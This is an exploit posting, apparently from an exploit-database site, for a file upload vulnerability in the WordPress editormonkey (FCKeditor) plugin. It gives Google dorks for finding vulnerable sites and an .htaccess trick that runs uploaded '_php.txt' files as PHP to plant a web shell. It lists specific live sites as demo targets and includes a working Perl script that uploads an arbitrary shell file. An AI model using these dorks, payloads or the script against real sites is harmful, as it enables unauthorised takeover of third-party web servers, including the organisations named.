###
# Title : WordPress Plugins (editormonkey-FCKe) Multiple File Upload Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) – Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com * r00tw0rm.com
# Facebook : http://facebook.com/KedAns
# platform : php
# Impact : File Upload
# Tested on : Windows 7 (fr)
##
# ya houcin ya Ov3r-X rebbi ydjiblek ecShFfa (*_^)
##
# | >> ——–+++=[ Dz Offenders Cr3w ]=+++——– << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | KinG Of PiraTeS * The g0bl!n * soucha * dr.R!dE .. |
# | ————————————————- < |
###
+ G0oglE d0rk’s :
– allinurk:plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
– allinurk:wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
+ p0c :
if test.php =>
creating .htaccess file :
<FilesMatch "_php.txt">
SetHandler application/x-httpd-php
</FilesMatch>
— and Upload him ^
+ Upload Shrll_php.txt
++ Find him in : http://target/UserFile/shell.php.txt
Dem0’s :
http://nhwgcap.org/_wing/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
http://nhwgcap.org/_wing/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
http://atghope.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/browser/default/browser.html
http://atghope.org/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/test.html
—————————————————————————————
o0R : ThiS PErl Scr!Pt3 :
#!/usr/bin/perl
system ("title KedAns-Dz");
system ("color 1e");
system ("cls");
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
|==================================================|
|= W0rdPrE3S (editormonkey) Arbitrary Shell Upload |
|= >> Provided By KedAns-Dz << |
|= e-mail : ked-h[at]hotmail.com |
|==================================================|
INTRO
print "\n";
print "[!] Enter URL(f.e: http://target.com): ";
chomp(my $url=<STDIN>);
print "\n";
print "[!] Enter File Path (f.e: C:\\Shell.php.gif): "; # File Path For Upload (usage : C:\\Sh3ll.php.gif)
chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.’/wp-content/plugins/editormonkey/fckeditor/editor/filemanager/upload/php/upload.php?Type=File’,
Content_Type => ‘multipart/form-data’,
Content =>
[
actions => ‘upload’,
NewFile => $file,
] );
print "\n";
if($re->is_success) {
if( index($re->content, "Disabled") != -1 ) { print "[+] Exploit Successfull! File Uploaded!\n"; }
else { print "[-] File Upload Is Disabled! Failed!\n"; }
} else { print "[-] HTTP request Failed!\n"; }
exit;
_END_
—————————————–
// SP-thX t0 : { Islampard }
0 条评论。